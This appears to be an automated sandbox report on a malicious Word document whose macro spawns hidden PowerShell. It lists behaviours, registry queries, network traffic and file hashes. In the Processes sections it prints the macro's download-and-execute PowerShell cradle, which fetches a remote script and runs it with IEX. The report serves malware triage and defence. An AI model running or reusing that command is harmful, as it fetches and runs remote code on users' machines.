Malware Analysis Report

2025-08-10 15:07

Sample ID 241103-zzb8lsvfll
Target 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
SHA256 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315

Threat Level: Known bad

The file 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Office macro that triggers on suspicious action

Suspicious Office macro

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-03 21:08

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-03 21:08

Reported

2024-11-03 21:11

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
N/A 127.0.0.1:8000 tcp

Files

memory/1696-0-0x000000002F521000-0x000000002F522000-memory.dmp

memory/1696-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1696-2-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/1696-10-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-7-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-6-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-5-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-4-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-15-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-14-0x0000000000370000-0x0000000000470000-memory.dmp

memory/2704-18-0x00000000002F0000-0x00000000002F9000-memory.dmp

memory/1696-19-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/1696-20-0x0000000000370000-0x0000000000470000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-03 21:08

Reported

2024-11-03 21:11

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

143s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 90.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
N/A 127.0.0.1:8000 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
US 95.100.195.47:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
GB 2.20.12.74:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 47.195.100.95.in-addr.arpa udp
US 8.8.8.8:53 74.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 74.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 160.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp

Files

memory/620-1-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp

memory/620-0-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-2-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-6-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-5-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-7-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-8-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-4-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-9-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-10-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-3-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-11-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp

memory/620-13-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-15-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-17-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-19-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp

memory/620-18-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-16-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-14-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-12-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-31-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-30-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/1364-35-0x00000254E25E0000-0x00000254E2602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbewux1h.jou.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/620-55-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-56-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp

memory/620-57-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-58-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 61b343870852ccc0e70c8d8c3bb4cc8c
SHA1 c0dcaee03722a93eab2fcfd618392bb33b5c84df
SHA256 3869ac37373af3706ac20ffa74d1de3a9bf15af52e7e9cb0a2374fca22cdc261
SHA512 1045cc8cf850a807ab9539e714cdeb7750b8da5751d40a634934845aec2094069a8a1c43c888c401424733b43c6d8227d2f7f478b9bdd79bf668ee3891f28b2f

memory/620-67-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDEFB4.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810